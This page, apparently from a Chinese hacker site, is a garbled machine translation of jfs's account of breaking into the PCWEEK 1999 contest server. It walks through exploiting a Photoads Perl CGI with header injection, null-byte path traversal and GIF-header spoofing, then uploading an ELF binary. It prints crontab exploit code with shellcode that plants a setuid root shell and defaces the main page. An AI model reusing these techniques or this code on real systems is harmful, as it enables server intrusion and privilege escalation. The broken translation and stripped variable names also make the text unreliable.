A CGI model invades |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analyzes>>CGI a model invasion  
                  Printing

            A CGI model invasion
            Www.cshu.net  2003-1-19  fog rain village 

              This was I before has looked an article, after looked a little 
              harvested, from beginning to end possibly somewhat revised ~~ to 
              paste everybody sharing 
              PCWEEK is this evaluation preparation prologue very interesting: 
              "Posts a reward 1,000 Dollar, attacks our server 
              How carries on the test to the system security? We first install 
              the similar application procedure on two kind of operating 
              systems, then lets entire 
              The world attacks. In this evaluation was different which with the 
              past on the server moved is in the real world procedure, 
              specifically mentioned 
              Is for the publication class stand design calssified ad system. 
              This test not only is test on operating system, simultaneously 
              also is 
              To whole test. In the NT platform, we will use ASP, IIS, MTS and 
              SQLServer 7; In Linux platform, we 
              Will use Apache and mod_perl. 
              Game rule 
              Must attack the goal is securelinux.hackpcweek.com and 
              securent.hackpcweek.com. Wins 1,000 Dollar 
              The ritual volume condition is the successful revision main page, 
              or obtains named top secret the top-secret document. We reject any 
              person 
              In has not obtained the success in the situation, destroys the 
              server the movement." 
              PCWEEK has produced the simple server disposition detailed list. 
              Is very long in view of the NT disposition detailed list, 
              definitely may say this kind of disposition is perfect 
              ; But short arrived regarding the RedHat disposition only had 20 
              lines, each line mostly only had 35 words, was allowed to say the 
              common user 
              The disposition can approach this standard. Below is to the RedHat 
              disposition detailed list: 
              "Disposes many districts /usrvartmpvar on the floppy disk 
              (original text so). 
              Installs RedHat 6.0, and does not install service and so on SMTP, 
              FTP and NEWS. 
              Installs Photoads (third party software, wrote CGI by perl, the 
              realization user writes down the calssified ad the function, for 
              details sees 
              Http://www.hoffice.com/), 
              Chmod 777 the photoads directory, 
              Chmod 755 cgi-bin, 
              Chmod 766 kas_data.pl, 
              Chmod 766 adnumber.num, 
              Chmod 766 ads_data.pl, 
              Chmod 755 all * cgi files, 
              Lacks the province table of contents for the photoads disposition, 

              Will upload the document the length establishment will be 0, 
              The deletion does not need user. 
              Set root password to (to what?) . 
              Forbids all services in inetd.conf. 
              Disposes by user nobody and moves the Apache server, 
              Forbids SSI (server side includes). 
              This kind of disposition has realized in the security-howto 
              suggestion and the apache group safe prompt." 
              PCWEEK real realization security-howto suggestion? Actually is no, 
              takes a system administration personnel 
              Your responsibility is maintains the system the movement, 
              including very important, is the renewal has the loophole 
              software. Moreover UN 
              IX is the extremely nimble system, this kind of software renewal 
              definitely may be automatic carries on by the system. 
              In in situation which like on states, PCWEEK on placed two servers 
              behind the firewall, and retained the web service 80 
              Port, in order to visit and attack. 
              The result is obvious, but also is has very much regarding a 
              related operating system secure test theatrically. First is in 
              On RedHat installs the third party software existence loophole, 
              causes a name to call jfs cracker to be able to enter the system; 
              Then jfs they benefit 
              With a known system loophole (patching procedure already issued a 
              month) obtained the root jurisdiction, and success repairing 
              Changed the server main page. 
              Below is jfs to attacks the process the narration: 
              "An actual attack analysis (attacks the PCWEEK server) By Jfs 
              First, I must collect the main engine information which related 
              must attack, looks which ports opened, which ports has possibly to 
              carry on 
              Attack. After as soon as turns the inspection, I discovered the 
              majority of ports are not are being protected by the firewall, is 
              as a result of tcp wrapper original 
              Thus cannot use, only had the HTTP server to be allowed to start. 
              Lemming:~# telnet securelinux.hackpcweek.com 80 
              Trying 208.184.64.170... 
              Connected to securelinux.hackpcweek.com. 
              Escape character is '^ ] '. 
              POST X HTTP/1.0 
              HTTP/1.1 400 Bad Request 
              Date: Fri, 24 Sep 1,999 23:42:15 GMT 
              Server: Apache/1.3.6 (Unix) (Red Hat/Linux) 
              (...) 
              Connection closed by foreign host. 
              Lemming:~# 
              Good, this is moves apache and the Red Hat machine. From the 
              PCWEEK prompt knew this server also should move mod 
              _perl, but mod_perl can leave behind some characteristics on the 
              server, but this server sends masthead actually certainly not 
              these marks 
              Elephant. 
              Apache 1.3.6 has not certainly attached the CGI procedure which 
              any far-end user may use, but I certainly did not know to RedHat 
              whether added 
              Some go in, therefore I tried to attack some common CGI loophole 
              (tect-cgi, wwwboard, count.cgi... ...) 

              In the experimental invalid situation, I try to discover this web 
              stand the table of contents structure, obtains the information 
              from the HTML page institute I to infer 
              This web server has the following table of contents under 
              DocumentRoot: 
              / 
              /cgi-bin 
              /photoads/ 
              /photoads/cgi-bin 
              I have had the interest immediately to photoads, I thought this is 
              very possible the software package which is may install. After as 
              soon as turns the on-line search, 
              I finally discovered this photoads is (www.hoffice.com) 
              distributes by "The Home Office Online" 
              Commercial software package, selling price 149 US dollars, and 
              allows you to use its original code (perl), like this you were 
              allowed to revise it. 
              I seek help from a friend, lets me have a look his photoads. This 
              enable me to have the opportunity to see on securelinux uses 
              software 
              Copy. 
              I looked have lacked the province to install the document, I was 
              allowed from the advertisement database (in 
              http://securelinux.hackpcweek.com/p 
              Hotoads/ads_data.pl) center obtains all users the advertisement 
              password. I also am trying visit disposition document /photoads/cg 

              I-bin/photo_cfg.pl, but because the server installs the 
              establishment to cause me to have no way to achieve the goal. 
              I discovered that, (similar test-cgi) I may know DocumentRoot item 
              through script /photoads/cgi-bin/env.cgi 
              Records in the filing system the position (/home/httpd/html), 
              moreover also has some other useful data (the server by 
              Any user's status movement, this is moves by nobody). 
              Therefore, I first am trying (Server side includes) and mod_perl 
              insert the order with SSI to HTML in, method like 
              Next: 
              <! --#include file= "..." -> for SSI 
              <! --#perl... --> for mod_perl 
              Through a perl regular expression, the server script has filtered 
              out the majority of inputs, nearly does not have how many spaces 
              to be allowed to use 
              . But I had also discovered pays the value quantity by the user, 
              it in turns in front of the HTML code certainly has not carried on 
              the inspection to the strange variable value 
              This gave me an opportunity to be allowed to insert the order in 
              the HTML code, in order to server end analysis. 
              Post.cgi 36 line of as follows: 
              Print "you are trying to post an AD from another URL:<b> 
              {'HTTP_REFERER'} \n" 
              ; 
              {'HTTP_REFERER'} is the variable which provides by the user (in 
              order to guarantee the accuracy, you must understand some HTTP 
              masthead 
              The principle of work), this variable may let us advance any HTML 
              code, no matter the code is any type. 
              This was true with getit.ssi and getit.mod-perl (two scripts, here 
              leaves out) works 
              Below we use the method: 
              Lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80 
              But unfortunately this machine by no means disposes SSI and 
              mod_perl, I sneaked in the impasse. 
              I decided looks for the loophole from the CGI script. The perl 
              script loophole mostly leaves in open (), system () or in the '' 
              transfer. Front 
              Permission read-write and execution, but latter two permissions 
              execution. 
              In procedure certainly not latter two situations appearance, but 
              indeed has several open () to transfer: 
              Lemming:~/photoads/cgi-bin# grep 'open. * (. *) ' *cgi | more 
              Advisory.cgi: Open (DATA, ""); 
              Edit.cgi: Open (DATA, ">BaseDir/DataFile"); 
              Edit.cgi: Open (MAIL, "|$mailprog -t") || die "Can't open! \n "; 
              Photo.cgi: Open (ULFD, ">$write_file") || die show_upload_failed 
              ("$!" 
              ; 
              Photo.cgi: Open (FILE); 
              (...) 
              Could not move any hands and feet to and us, because they all were 
              define in the disposition document, procedure 
              The movement later will be cannot change. 
              Also is so 
              But other two lines are worth studying well 
              Photo.cgi 132 line of as follows: 
              =; 
              Open (ULFD, ">$write_file") || die show_upload_failed ("$!" ; 
              Print ULFD {'FILE_CONTENT'}; 
              Close (ULFD); 
              If we may revise the variable, then we were allowed to write in 
              the system any document. This 
              Le variable definition as follows: 
              =; 
              Is by the disposition file definition, we have no way to revise, 
              then? 
              Photo.cgi 226 line of as follows: 
              If (! {'FILE_NAME'}) {show_file_not_found (); } 
              = lc ({'FILE_NAME'}); 
              =~ s/. +\\ ([ ^\\ ] +) $|. +\/ ([ ^\/ ] +) $/\1/; 
              If (=~ m/gif/) { 
              = ' gif'; 
              } elsif (=~ m/jpg/) { 
              = ' jpg'; 
              } else { 
              {&Not_Valid_Image} 
              } 
              The value comes from {'FILE_NAME'} (is submits by form for in the 
              CGI variable analyzes). In order to 
              Let us hope to us the place, must satisfy a regular expression, we 
              cannot simple transmit us 
              Needs the filename, for example "../../../../../../../.. 
              /etc/passwd" is not good, it is passing as follows 
              After the replace, also cannot obtain any: 
              =~ s/. +\\ ([ ^\\ ] +) $|. +\/ ([ ^\/ ] +) $/\1/; 
              If matches with this regular expression, then it will turn the 
              ASCII code 1 (SOH). In addition 
              Ename also must include "gif" or "jpg", otherwise it will be 
              unable through the Not_Valid_Image inspection. 
              In carried on as soon as turned the attempt, I finally have 
              discovered /jfs/\ in under the Phreck related perlCGI security 
              article help.. 
              /../../../../../.. /export/www/htdocs/index.html%00.gif may let us 
              submit the index.html article 
              (We must revise main page). But in front of uploading, we also 
              must try to find solution to deceive some script codes. 
              We discovered if we by POST method transmission form, we will not 
              be able to get by under false pretences (%00 not to be able to 
              analyze), 
              Therefore we only could use GET. 
              In the photo.cgi 256 lines, we may see to section of codes can the 
              document which just uploaded to us the content carried on the 
              inspection, 
              If the document does not conform to the specific image 
              specification (mainly is width, is high and size), the script will 
              be able to delete or to rewrite this document, this 
              Is we did not hope sees, at least we must leave behind some our 
              materials on the server. (Attention, photo.cgi foot 
              Originally may use for to upload the advertisement picture which 
              uses by yours advertisement.) 
              PCWEEK establishes in the disposition document ImageSize 0, 
              therefore we do not use tube related JPG the part, will let us pay 
              attention 
              The strength concentrates to GIF are partial. 
              If (substr (, -4, 4) eq "gif") { 
              Open (FILE); 
              My; 
              My = "A6vvb8CC"; 
              My $$PP CtDescFmt = "vvvvb8"; 
              Read FILE, 13; 
              (my,, my, my, my) = unpack 
              DFmt,; 
              Close FILE; 
              $$PP OtoWidth =; 
              $$PP OtoHeight =; 
              $$PP OtoSize =; 
              Return; 
              } 
              Photo.cgi 140 line of as follows: 
              If (($$PP OtoWidth eq "") || ($$PP OtoWidth > '700')) { 
              {&Not_Valid_Image} 
              } 
              If ($$PP OtoWidth > || $$PP OtoHeight >) { 
              {&Height_Width} 
              } 
              Therefore we can not but $$PP OtoWidth establishes is smaller than 
              700, is not "", and is smaller than ImgWidth (lacks province is 
              350). 
              Therefore has $$PP OtoWidth! = "" && $$PP OtoWidth<350. 
              Regarding $$PP OtoHeight, it must be younger than (lacks province 
              is 250). Therefore $$PP OtoWidth = $$PP OtoHe 
              Ight = 0 is just right. Pays the value method from the script to 
              look, we so long as 6th and 9 bytes set at this value 0 (NUL) to 
              be allowed 
              . 
              We above guaranteed our FILE_CONTENT conforms to the condition, 
              and continued to carry on next step... ... 
              Chmod 0755,; 
              =; 
              Rename ("", ""); 
              Show_Upload_Success (); 
              After the above code, our document is named again or said moved 
              the place which we did not hope. 
              Examined the related variable value the final code, we saw it only 
              can contain the Arabic numeral: 
              {'AdNum'} =~ tr/0-9//cd; 
              {'Password'} =~ tr/a-zA-Z0-9! +& # %$@*//cd; 
              = {'AdNum'}; 
              Other things are all removed, therefore we cannot in here 
              use../../../cheated the technique. 
              How manages? Rename () the function needs two ways parameters, is 
              new, is old... ... This function does not have 
              Has the wrong examination, therefore if it makes a mistake, the 
              procedure can jump, how can we cause it to make a mistake? With 
              illegal 
              Filename. The Linux system lacks the province the longest filename 
              limit is 1,024 (MAX_PATH_LEN), therefore if we can 
              Let this script name ours document to be better than again 1,024 
              byte long document speech. 
              Next step of we will submit about 1,024 byte advertisements serial 
              numbers (AD number). 
              Now, the script like has not conceived movement, because he only 
              allows on us to pass on the existence the advertisement serial 
              number picture. (Makes that 10 
              The ^1024 numeral has spend our many time.) 
              Also is an impasse? 
              Does not have, that imperfect input examination function lets us 
              have opportunity further improvement this numeral. Simple browsing 
              ed 
              It.cgi this script, thinks, if you input a name then are the 
              carriage return, finally is that 1,024 numerals, can occur 
              What? Ha ha, had. 
              That long.adnum document lets us have the opportunity to establish 
              a new advertisement. 
              After we were allowed to deceive the advertisement serial number 
              inspection below, we were allowed to accomplish using the script 
              the matter: 
              The establishment/rewrites any nobody to have the jurisdiction the 
              document, and may cause the content which this document is we 
              hoped (except is GIF remains 
              Has NUL the article article). 
              Good, lets us try. 
              Above confirmed script overwrite.as.nobody allows us to obtain the 
              jurisdiction. 
              All is good until at present, we adjust the script in order to 
              rewrites index.html... ... But has not succeeded. 
              Possibly is we does not have the jurisdiction to change this 
              document (to be possible because document owner is root, or 
              document does not have establishment to write jurisdiction). 
              How manages? We seek the outlet in addition. 
              We try to rewrite CGI, whether has a look us to let it work for 
              us. Like this we were allowed to seek "top-secret" the document 
              That victory is in sight. 
              We revised the overwrite script, is very good, he allows us to 
              rewrite CGI! 
              We decided does not revise these important (is relatively 
              rigorous) CGI, we chose advisory.cgi (to manage it do any 
              ?) . 
              Like this we were allowed on to pass on the shell script which 
              could allow us to execute the order, too has been good... ... 
              But, when you move shell script time by the CGI form, you must 
              perform in the script first line to explain regarding this, under 
              elephant 
              Surface like this: 
              #! /bin/sh 
              Echo "Content-type: Text/html " 
              Find/"*secret*" -print 
              But, did not forget, we 6th, 7, 8, 9 bytes had to be 0 or a very 
              small value, adapted the related graph size 
              Stipulation... ... 
              #! /bi\00\00\00\00n/sh 
              Like this is not good, the essence read-only first 5 bytes, then 
              have attempted to carry out "#! /bi "... ... I know, but also does 
              not have me 
              May move 3 bytes (sur- #! Two bytes) shell. Also is the impasse... 
              ... 
              ELF (linux lacked province to be possible execution file form) the 
              document to give us the answer, the result we has succeeded that 
              several 
              The byte set at 0x00, too was wonderful. 
              Now we need may the execution file put ELF to far-end the server 
              on. We must cause it to conform to the URL standard, because 
              Only may use GET for us the method, cannot use POST, like this we 
              at least must conform to the longest URI limit. Regarding Apache 
              Server longest URI is 8,190 bytes, did not forget us also to have 
              to use very big 1,024 characters the numerals, therefore gave us 
              Conformed to URL the standard ELF procedure to leave behind the 
              space only to have 7,000 bytes. 
              It only could be a script. 
              Lemming:~/pcweek/hack/POST# cat fin.c 
              #include <stdio.h> 
              Main () 
              { 
              Printf ("Content-type: Text/html\n\n\r"); 
              Fflush (stdout); 
              Execlp ("/usr/bin/find", "find", "/",0); 
              } 
              After translation as follows: 
              Lemming:~/pcweek/hack/POST# ls -l fin 
              -rwxr-xr-x 1 root root 4,280 Sep 25 04:18 fin* 
              Lemming:~/pcweek/hack/POST# strip fin 
              Lemming:~/pcweek/hack/POST# ls -l fin 
              -rwxr-xr-x 1 root root 2,812 Sep 25 04:18 fin* 
              Lemming:~/pcweek/hack/POST# 
              Then lets it conform to the URL standard: 
              Lemming:~/pcweek/hack/POST#. /to_url < fin > fin.url 
              Lemming:~/pcweek/hack/POST# ls -l fin.url 
              -rw-r--r-- 1 root root 7,602 Sep 25 04:20 fin.url 
              Must speech which uses in ours script, it was oversized. 
              We only depend on our intuition to come manually to edit this 
              binary file, we decided this to be possible in the execution file 
              "GCC" 
              After character string all contents all delete. Such does nearly 
              does not have any theory the basis, if must act according to on 
              studies EL 
              F has been standard, but such does as if also may: 
              Lemming:~/pcweek/hack/POST# joe fin 
              Lemming:~/pcweek/hack/POST# ls -l fin 
              -rwxr-xr-x 1 root root 1,693 Sep 25 04:22 fin* 
              Lemming:~/pcweek/hack/POST#. /to_url < fin > fin.url 
              Lemming:~/pcweek/hack/POST# ls -l fin.url 
              -rw-r--r-- 1 root root 4,535 Sep 25 04:22 fin.url 
              Lemming:~/pcweek/hack/POST# 
              Now, we merge our work achievement, then movement... ... 
              We examined in our table of contents named get, sec, find 
              document, hoped obtains more information. 
              Can find the to_url script in here you, with some simple C 
              document, these things and URL analyzes together, great work 
              accomplished 
              . 
              Now we upload this CGI, then the browser which likes with us 
              visits it: 
              Wget 
              http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi; 
              Like this we/have carried on the comprehensive search to the 
              server on. 
              But they "top-secret" document not in that, or is unable by the 
              nobody status to visit. 
              We have attempted some order combinations, like locate, ls and 
              some other orders, but does not help matters. 
              If this document existence, then it actually in. 
              Now the question has been serious, had to want root the 
              jurisdiction. The direct positive my friend said does such, why 
              have ready-made does not use 
              ? Therefore, knows according to us concerns that server the 
              situation (Linux, i386, because my machine is i386, and 
              Also my that ELF document already moved above it). We searched the 
              data which software renews, has discovered all to 
              Edition RedHat all may the use crontab loophole (the translator 
              pour: The detail will discuss in behind). 
              You may find in recent bugtraq/securityfocus. Too good, we perform 
              according to ours need to it to repair 
              Changes, obviously we simply do not need interactive root user 
              shell, we so long as make suidroo which nobody may visit 
              T shell has been good: 
              #include <stdio.h> 
              #include <sys/types.h> 
              #include <sys/stat.h> 
              #include <unistd.h> 
              #include <pwd.h> 
              Char shellcode [ ] = 
              "\xeb\x40\x5e\x89\x76\x0c\x31\xc0\x89\x46\x0b\x89\xf3\xeb" 
              "\x27w00w00:Ifwewerehackerswedownyourdumbass\x8d\x4e" 
              "\x0c\x31\xd2\x89\x56\x16\xb0\x0b\xcd\x80\xe8\xbb\xff\xff" 
              "\xff/tmp/w00w00"; 
              Int main (int argc, char *argv [ ]) 
              { 
              FILE *cfile, *tmpfile; 
              Struct stat sbuf; 
              Int x; 
              Chdir ("/tmp"); 
              Cfile = fopen ("/tmp/cronny", "a+"); 
              Tmpfile = fopen ("/tmp/w00w00", "a+"); //, 
              S_IXUSR|S_IXGRP|S_IXOTH); 
              Fprintf (cfile, "MAILTO="); 
              For (x=0; X<96; X++) 
              Fprintf (cfile, "w00w00"); 
              Fprintf (cfile, "%s", shellcode); 
              Fprintf (cfile, "\n* * * * * date\n"); 
              Fflush (cfile); 
              Fprintf (tmpfile, "#! /bin/sh\ncp /bin/bash /tmp/ bs\nchmod 4,755 
              /tmp/ bs\n"); 
              Fflush (tmpfile); 
              Fclose (cfile), fclose (tmpfile); 
              Chmod ("/tmp/w00w00", S_IXUSR|S_IXGRP|S_IXOTH); 
              Execl ("/usr/bin/crontab", "crontab", "/tmp/cronny", (char *) 0); 
              } 
              Revises after us, caused this shell to aim at /tmp/ bs. We 
              reupload CGI, and causes it with ours browser 
              The movement, then we prepared to carry on test. 
              We made CGI to carry on the primary test, it will carry out ls 
              /tmp. We have truly realized suidroot. 
              (...) 
              Execlp ("/bin/ls", "ls", "-ula", "/tmp",0); 
              (...) 
              We then used for to replace index.html the document to upload 
              /tmp/xx. 
              (...) 
              Execlp ("/tmp/ bs", "ls", "-c", "cp /tmp/xx 
              /home/httpd/html/index.html",0); 
              (...) 
              Should make the procedure which finally had to move: 
              (...) 
              Execlp ("/tmp/ bs", "ls", "-c", "cp /tmp/xx 
              /home/httpd/html/index.html",0); 
              (...) 
              The game reached this point finished. 
              Altogether consumes when 20 hours. 
              Finally we uploaded ours material and the copy arrived a security 
              and the nobody obviously place, then sent a news to the discussion 
              group and to start to wait for replied.



              Original author: N/a 
              Origin: N/a 
              Altogether has 87 readers to read this article 

              [Tells friend] 
            Previous article:High-level cushion overflow use 

            Next article:Sniffer some materials 

            - this week popular article - related article 
            A CGI model invasion
            A CGI model invasion
            Hacking CGI



      CSHU 
